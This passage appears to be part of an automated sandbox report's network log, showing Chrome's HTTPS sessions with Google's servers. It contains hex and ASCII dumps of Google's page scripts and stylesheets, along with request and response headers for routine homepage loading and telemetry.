2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 5b 63 5d 2e 62 3f 22 31 22 3a 22 30 22 29 29 3b 72 65 74 75 72 6e 20 62 2e 6a 6f 69 6e 28 22 2c 22 29 7d 2c 59 66 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 53 74 72 69 6e 67 28 61 29 3b 62 26 26 28 61 2b 3d 22 2c 22 2b 62 29 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 28 58 66 69 2c 61 29 7d 2c 5a 66 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 3d 0a 63 3d 3d 3d 76 6f 69 64 20 30 3f 32 3a 63 3b 69 66 28 63 3c 31 29 59 66 69 28 37 2c 62 29 3b 65 6c 73 65 7b 76 61 72 20 64 3d 6e 65 77 20 49 6d 61 67 65 3b 64 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 5a 66 69 28 61 2c 62 2c 63 2d 31 29 7d 3b 64 2e 73 72 63 3d 61 7d 7d 2c 53 66 69 3d 50 66 69 28 5b 39 37 2c 31 31 39 2c 31 31 35 2c 31 31 31 2c 31 30 37 5d 29 2c 55 66 69 3d 50 66 Data Ascii: [c].b?"1":"0"));return b.join(",")},Yfi=function(a,b){a=String(a);b&&(a+=","+b);google.log(Xfi,a)},Zfi=function(a,b,c){c=c===void 0?2:c;if(c<1)Yfi(7,b);else{var d=new Image;d.onerror=function(){Zfi(a,b,c-1)};d.src=a}},Sfi=Pfi([97,119,115,111,107]),Ufi=Pf
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 74 73 57 69 74 68 28 22 64 61 74 61 3a 22 29 29 7b 76 61 72 20 63 3d 66 49 62 28 61 2e 73 72 63 2c 30 2c 62 2c 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 26 26 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 30 29 3b 61 2e 73 72 63 21 3d 3d 63 2e 73 72 63 26 26 28 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 77 69 64 74 68 3d 63 2e 77 69 64 74 68 3b 61 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 7d 2c 61 2e 73 72 63 3d 63 2e 73 72 63 2c 61 2e 63 6f 6d 70 6c 65 74 65 26 26 28 61 2e 77 69 64 74 68 3d 63 2e 77 69 64 74 68 29 29 7d 7d 3b 69 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 22 30 22 3f 22 22 3a 61 2b 22 70 78 22 7d 3b 6a 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 Data Ascii: tsWith("data:")){var c=fIb(a.src,0,b,a.parentElement&&a.parentElement.clientWidth\|\|0);a.src!==c.src&&(a.onload=function(){a.width=c.width;a.onload=null},a.src=c.src,a.complete&&(a.width=c.width))}};iIb=function(a){return a==="0"?"":a+"px"};jIb=function(a)
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 29 7d 0a 74 72 79 7b 0a 5f 2e 4c 48 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 2e 62 76 7c 7c 22 22 3b 5f 2e 4d 48 62 3d 6e 65 77 20 4d 61 70 3b 5f 2e 68 70 61 28 22 73 6b 65 77 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 22 22 2c 62 3d 21 30 2c 63 3d 5f 2e 63 62 28 5f 2e 4d 48 62 2e 65 6e 74 72 69 65 73 28 29 29 2c 64 3d 63 2e 6e 65 78 74 28 29 3b 21 64 2e 64 6f 6e 65 3b 64 3d 63 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 65 3d 5f 2e 63 62 28 64 2e 76 61 6c 75 65 29 3b 64 3d 65 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 65 3d 65 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 61 2b 3d 28 62 3f 22 22 3a 22 2c 22 29 2b 64 2b 22 Data Ascii: )}try{_.LHb=window.google&&window.google.erd&&window.google.erd.bv\|\|"";_.MHb=new Map;_.hpa("skew",function(){for(var a="",b=!0,c=_.cb(_.MHb.entries()),d=c.next();!d.done;d=c.next()){var e=_.cb(d.value);d=e.next().value;e=e.next().value;a+=(b?"":",")+d+"
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 20 63 3d 5f 2e 63 62 28 61 2e 6b 61 29 2c 64 3d 63 2e 6e 65 78 74 28 29 3b 21 64 2e 64 6f 6e 65 3b 64 3d 63 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 65 3d 64 2e 76 61 6c 75 65 3b 64 3d 65 2e 72 65 73 6f 6c 76 65 3b 65 3d 65 2e 72 65 6a 65 63 74 3b 62 3f 65 28 62 29 3a 64 28 7b 76 61 6c 75 65 3a 76 6f 69 64 20 30 2c 64 6f 6e 65 3a 21 30 7d 29 7d 61 2e 6b 61 2e 6c 65 6e 67 74 68 3d 30 7d 7d 3b 5f 2e 72 76 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 69 66 28 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 6f 61 2e 73 68 69 66 74 28 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 7b 76 61 6c 75 65 3a 62 2c 64 6f 6e 65 3a 21 31 7d 29 Data Ascii: c=_.cb(a.ka),d=c.next();!d.done;d=c.next()){var e=d.value;d=e.resolve;e=e.reject;b?e(b):d({value:void 0,done:!0})}a.ka.length=0}};_.rv.prototype.next=function(){var a=this;if(this.oa.length){var b=this.oa.shift();return Promise.resolve({value:b,done:!1})
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 6f 74 79 70 65 2e 71 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 55 69 28 74 68 69 73 2c 31 29 7d 3b 5f 2e 5a 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 45 61 3d 5f 2e 6e 28 61 29 7d 3b 5f 2e 47 28 5f 2e 5a 48 62 2c 5f 2e 72 29 3b 76 61 72 20 24 48 62 2c 61 49 62 3b 5f 2e 50 48 62 3d 5f 2e 78 65 28 5f 2e 63 61 2e 6b 61 3f 22 6e 22 3a 22 73 22 2c 5f 2e 48 4d 61 29 3b 24 48 62 3d 6e 65 77 20 4d 61 70 3b 61 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 6b 61 3d 6e 75 6c 6c 3b 74 68 69 73 2e 6f 61 3d 61 2b 22 5f 5f 68 22 3b 74 68 69 73 2e 77 61 3d 61 2b 22 5f 5f 72 22 3b 74 68 69 73 2e 70 72 69 6f 72 69 74 79 3d 62 26 26 62 2e 70 72 69 6f 72 69 74 79 7d 3b 5f 2e 62 49 62 3d 66 75 6e 63 74 69 6f 6e 28 Data Ascii: otype.qe=function(){return _.Ui(this,1)};_.ZHb=function(a){this.Ea=_.n(a)};_.G(_.ZHb,_.r);var $Hb,aIb;_.PHb=_.xe(_.ca.ka?"n":"s",_.HMa);$Hb=new Map;aIb=function(a,b){this.ka=null;this.oa=a+"__h";this.wa=a+"__r";this.priority=b&&b.priority};_.bIb=function(
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 29 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 2d 22 2c 22 5f 22 29 3b 61 3d 5f 2e 6b 66 28 61 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 75 4e 61 28 61 29 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 48 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6e 65 77 20 4d 61 70 2c 62 3d 5f 2e 58 63 28 22 65 6a 4d 4c 43 64 22 29 3b 62 2e 46 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 47 65 6f 22 2c 5f 2e 50 6b 28 62 29 29 3b 62 3d 5f 2e 58 63 28 22 50 59 46 75 44 63 22 29 3b 62 2e 46 62 28 29 26 26 61 2e 73 65 74 28 22 58 2d 43 6c 69 65 6e 74 2d 44 61 74 61 22 2c 5f 2e 50 6b 28 62 29 29 3b 62 3d 5f 2e 58 63 28 22 4a 48 48 4b 75 62 22 29 3b 62 2e 46 62 28 29 26 26 61 2e 73 65 74 Data Ascii: ).replaceAll("-","_");a=_.kf(a);return new _.uNa(a)};}catch(e){_._DumpException(e)}try{_.wHb=function(){var a=new Map,b=_.Xc("ejMLCd");b.Fb()&&a.set("X-Geo",_.Pk(b));b=_.Xc("PYFuDc");b.Fb()&&a.set("X-Client-Data",_.Pk(b));b=_.Xc("JHHKub");b.Fb()&&a.set
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 74 72 69 6e 67 28 29 3b 28 65 3d 5f 2e 78 48 62 28 65 29 29 26 26 28 61 3d 61 2b 22 26 61 73 79 6e 63 3d 22 2b 65 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 41 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 3d 3d 3d 22 22 29 61 3d 22 2f 61 73 79 6e 63 2f 22 2b 61 3b 65 6c 73 65 20 69 66 28 62 3d 3d 3d 22 66 65 65 64 5f 61 70 69 22 29 61 3d 22 2f 66 65 65 64 2d 61 70 69 2f 61 73 79 6e 63 2f 22 2b 61 3b 65 6c 73 65 20 69 66 28 62 3d 3d 3d 22 73 65 61 72 63 68 22 29 61 3d 22 2f 22 2b 62 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 66 60 22 2b 62 29 3b 69 66 28 21 7a 48 62 2e 74 65 73 74 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 66 60 22 2b 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 43 48 62 3d 66 75 6e 63 74 69 Data Ascii: tring();(e=_.xHb(e))&&(a=a+"&async="+e);return a};_.AHb=function(a,b){if(b==="")a="/async/"+a;else if(b==="feed_api")a="/feed-api/async/"+a;else if(b==="search")a="/"+b;else throw Error("Ef`"+b);if(!zHb.test(a))throw Error("Ff`"+a);return a};_.CHb=functi
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 7a 30 2d 39 2d 5f 2f 5d 2b 28 63 61 6c 6c 62 61 63 6b 3a 5c 64 2b 29 3f 24 2f 69 3b 5f 2e 45 48 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 5f 2e 46 48 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 47 48 62 3d 5f 2e 58 43 61 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6f 48 62 3d 5f 2e 4b 28 22 7a 62 57 32 43 66 22 29 3b 5f 2e 70 48 62 3d 5f 2e 4b 28 22 4f 5a 33 4d 37 65 22 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6e 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 63 3d 63 3d 3d 3d 76 6f 69 64 20 30 3f 7b 7d 3a 63 3b 5f 2e 4b 49 61 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 64 3d 3d 3d 76 Data Ascii: z0-9-_/]+(callback:\d+)?$/i;_.EHb=function(){};_.FHb=function(){};GHb=_.XCa;}catch(e){_._DumpException(e)}try{_.oHb=_.K("zbW2Cf");_.pHb=_.K("OZ3M7e");}catch(e){_._DumpException(e)}try{_.nHb=function(a,b,c,d){c=c===void 0?{}:c;_.KIa.call(this,a,d===v
2024-12-12 21:40:36 UTC	1390	IN	Data Raw: 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 31 5d 29 7d 3b 5f 2e 72 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 64 65 74 61 69 6c 73 29 7b 69 66 28 61 2e 64 65 74 61 69 6c 73 2e 73 3d 3d 3d 34 32 39 29 7b 76 61 72 20 62 3d 61 2e 64 65 74 61 69 6c 73 2e 72 75 72 6c 3b 69 66 28 28 30 2c 5f 2e 73 62 61 29 28 62 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 22 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 22 29 3e 2d 31 29 72 65 74 75 72 6e 20 62 7d 69 66 28 61 2e 64 65 74 61 69 6c 73 2e 65 29 72 65 74 75 72 6e 20 5f 2e 72 49 62 28 61 2e 64 65 74 61 69 6c 73 2e 65 29 7d 7d 3b 0a 5f 2e 74 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 73 49 62 2b 2b 3b 73 49 62 3d 3d 3d 31 26 26 5f 2e 68 70 61 28 22 64 6f 73 22 2c 66 75 Data Ascii: turn decodeURIComponent(b[1])};_.rIb=function(a){if(a.details){if(a.details.s===429){var b=a.details.rurl;if((0,_.sba)(b)&&b.indexOf("/sorry/index?")>-1)return b}if(a.details.e)return _.rIb(a.details.e)}};_.tIb=function(a,b){sIb++;sIb===1&&_.hpa("dos",fu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49801	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1120	OUT	GET /xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=0/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=sylx,sypx?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:36 UTC	817	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1689 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:29 GMT Expires: Fri, 12 Dec 2025 21:40:29 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT Content-Type: text/css; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 7 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:36 UTC	573	IN	Data Raw: 2e 4d 54 49 61 4b 62 2c 2e 4c 77 44 55 64 63 2c 2e 46 41 6f 45 6c 65 2c 2e 52 6c 54 43 50 64 2c 2e 77 50 4e 66 6a 62 2c 2e 63 61 4e 76 66 64 2c 2e 56 6e 6f 62 34 62 2c 2e 62 62 78 54 42 62 2c 2e 44 70 67 6d 4b 2c 2e 59 4b 55 68 66 62 2c 2e 75 4e 6e 76 62 2c 2e 61 56 73 5a 70 66 2c 2e 52 6f 4f 56 6d 66 2c 2e 64 49 66 76 51 64 2c 2e 56 33 45 7a 6e 2c 2e 45 6e 62 39 70 65 2c 2e 6d 59 75 6f 61 66 2c 2e 6b 4a 53 42 38 2c 2e 74 55 72 34 4b 63 2c 2e 69 51 4d 74 71 65 7b 2d 2d 59 69 34 4e 62 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 70 45 61 30 42 63 3a 76 61 72 28 2d 2d 62 62 51 78 41 62 29 3b 2d 2d 6b 6c 6f 47 33 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 59 61 49 65 4d 62 3a 76 61 72 28 2d 2d 58 4b 4d 44 78 63 29 3b 2d 2d 50 61 38 57 6c 62 3a Data Ascii: .MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:
2024-12-12 21:40:36 UTC	1116	IN	Data Raw: 76 65 7d 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 59 70 63 44 6e 66 2e 48 47 31 64 76 64 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 48 47 31 64 76 64 3e 2a 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 57 74 56 35 6e 64 20 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 2e 5a 74 30 61 35 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 7d 2e 47 5a 6e 51 71 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 45 70 50 59 4c 64 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 45 70 50 59 4c 64 2c 2e 43 42 38 6e 44 65 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 Data Ascii: ve}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49802	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1452	OUT	POST /gen_204?atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&s=promo&rt=hpbas.10228,hpbarr.1&zx=1734039627406&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=JOJzuArTc2WJ1KLLBX_l_UvUpx2POqy94f2s4TAfz1dBAZFKmd6tzH7oOGxkdEZ_OUFPe1OMTPNpR5e24BZQwA2pOuetOfUrTlb0ZW2IEN_La7UwJTGdFebYJgnz0geau0mIDt0eej_7XwI724n5MP3PLEYh-3Ct3qfbjClQG7zYvom265bYLT8Z20tFrAO3LQu5iKRd2lFuftJc
2024-12-12 21:40:36 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-MATku_rzzNeqMEakkf2FBw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:36 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49805	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1444	OUT	POST /gen_204?atyp=i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&dt19=2&prm23=0&zx=1734039627412&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:36 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-bnfG5nQw9uhUBMnZUnHeFQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:36 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49803	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1523	OUT	POST /gen_204?atyp=i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQuqMJCCY..s&bl=D9Ku&s=webhp&lpl=CAUYATACOANiCAgQEMCW2cUB&zx=1734039627429&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:36 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4EVbXLw-F4UP9SIOIOt79A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:36 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

